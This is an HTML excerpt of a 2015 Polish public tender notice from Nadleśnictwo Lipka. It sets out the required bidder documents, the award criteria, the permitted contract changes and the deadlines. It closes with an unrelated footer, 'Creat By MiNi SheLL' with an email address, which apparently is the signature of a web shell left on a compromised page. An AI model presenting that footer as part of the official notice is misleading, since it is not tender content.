<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy 2. Oświadczenie o spełnieniu warunków ubiegania się o zamówienie publiczne z
art. 22 ustawy. 3. Kosztorys ofertowy. 4. Pełnomocnictwo do reprezentowania wykonawcy, o ile ofertę
składa pełnomocnik. 5. Propozycje zlecenia części zamówienia podwykonawcom o ile Wykonawca
będzie korzystał z podwykonawstwa. 6. Podpisany harmonogram rzeczowy. 7. Dokument lub
dokumenty, z których będzie wynikać uprawnienie do podpisania oferty, jeżeli nie wynika to z innych
dokumentów załączonych do oferty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Okres gwarancji - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Istotne postanowienia umowy określa wzór umowy stanowiący Załącznik Nr 9 do niniejszej
Specyfikacji. 2. Zawarta umowa będzie jawna i będzie podlegała udostępnianiu na zasadach
określonych w przepisach o dostępie do informacji publicznej ( art. 139 ust. 3 ustawy) 3. Zmiany
postanowień niniejszej umowy wymagają formy pisemnej pod rygorem nieważności i są dopuszczalne
tylko w granicach unormowania art. 144 ustawy. 4. Zamawiający przewiduje możliwość zmian
postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru
Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z
uwzględnieniem podawanych warunków ich wprowadzenia. 5. Zmiana terminu realizacji przedmiotu
umowy 5.1. Zmiany spowodowane warunkami atmosferycznymi, w szczególności: a) klęski żywiołowe,
b) warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych, przeprowadzanie prób i
sprawdzeń, dokonywanie odbiorów. 5.2. Zmiany spowodowane warunkami geologicznymi,
archeologicznymi lub terenowymi, w szczególności: a) niewypały i niewybuchy, b) wykopaliska
archeologiczne nie przewidywane w SIWZ, c) odmienne od przyjętych w dokumentacji projektowej
warunki geologiczne (kategorie gruntu, kurzawka, itp.), d) odmienne od przyjętych w dokumentacji
projektowej warunki terenowe, w szczególności istnienie podziemnych urządzeń, instalacji lub obiektów
infrastrukturalnych. 5.3. Zmiany będące następstwem okoliczności leżących po stronie Zamawiającego,
w szczególności: a) wstrzymanie robót przez Zamawiającego, b) konieczność usunięcia błędów lub
wprowadzenia zmian w dokumentacji projektowej. 5.4. Zmiany będące następstwem działania organów
administracji, w szczególności: a) przekroczenie zakreślonych przez prawo terminów wydawania przez
organy administracji decyzji, zezwoleń, itp., b) odmowa wydania przez organy administracji wymaganych
decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji projektowej. 5.5. Inne przyczyny
zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością prowadzenia
prac. 5.6. W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt. 1 - 5 termin
wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia
wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.
6. Zmiana sposobu spełnienia świadczenia 6.1.Zmiany technologiczne, w szczególności: a) konieczność
zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych niż
wskazane w dokumentacji technicznej, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań
groziło niewykonaniem lub wadliwym wykonaniem projektu, b) odmienne od przyjętych w dokumentacji
technicznej warunki geologiczne (kategorie gruntu, kurzawka, itp.) skutkujące niemożliwością
zrealizowania przedmiotu umowy przy dotychczasowych założeniach technologicznych, c) odmienne od
przyjętych w dokumentacji technicznej warunki terenowe, w szczególności istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych, d) konieczność zrealizowania projektu przy
zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego
prawa. Zmiany, o których mowa powyżej nie mogą być powodem zwiększenia wynagrodzenia zgodnie z
zasadami ceny kosztorysowej określonej w Kodeksie Cywilnym. 6.2. Zmiany osobowe - zmiana osób,
przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej
równoważnymi uprawnieniami i kwalifikacjami, o których mowa w ustawie Prawo budowlane lub innych
ustawach, a także SIWZ, będzie wymagała również zaakceptowania przez Zamawiającego. Zmiana ta
dotyczy również sytuacji, w której Wykonawca zdecyduje się na realizację przedmiotu zamówienia za
pomocą podwykonawców. 7. Pozostałe zmiany a) zmiana obowiązującej stawki VAT: - jeśli zmiana
stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy,
Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie
podatku VAT zapłaconego przez wykonawcę, - jeśli zmiana stawki VAT będzie powodować
zmniejszenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość
zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT do zapłacenia przez
wykonawcę, b) rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim
przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym Zamawiający
zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które Wykonawca poniósł w
związku z wynikającymi z umowy planowanymi świadczeniami. c) kolizja z planowanymi lub równolegle
prowadzonymi przez inne podmioty remontami. W takim przypadku zmiany w umowie zostaną
ograniczone do zmian koniecznych powodujących uniknięcie kolizji, a wynagrodzenie zostanie ustalone
z zachowaniem zasady opisanej w lit d). 8. Wszystkie powyższe postanowienia stanowią katalog zmian,
na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia
takiej zgody. 9 Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy: a) zmiana danych związanych
z obsługą administracyjno-organizacyjną Umowy (np. zmiana nr rachunku bankowego), b) zmiany
danych teleadresowych, zmiany osób wskazanych do kontaktów między Stronami, 10 Zamawiający
zastrzega sobie prawo do odstąpienia od zawarcia umowy w wyjątkowych sytuacjach, zgodnie z art. 145
ustawy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.lasy.gov.pl/dg/rdlp_pila/nadl_lipka<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe, Nadleśnictwo Lipka, Mały Buczek 38, 77-420 Lipka.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.10.2015 godzina 09:00, miejsce: Nadleśnictwo Lipka, mały Buczek 38, sekretariat Nadleśnictwo Lipka..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com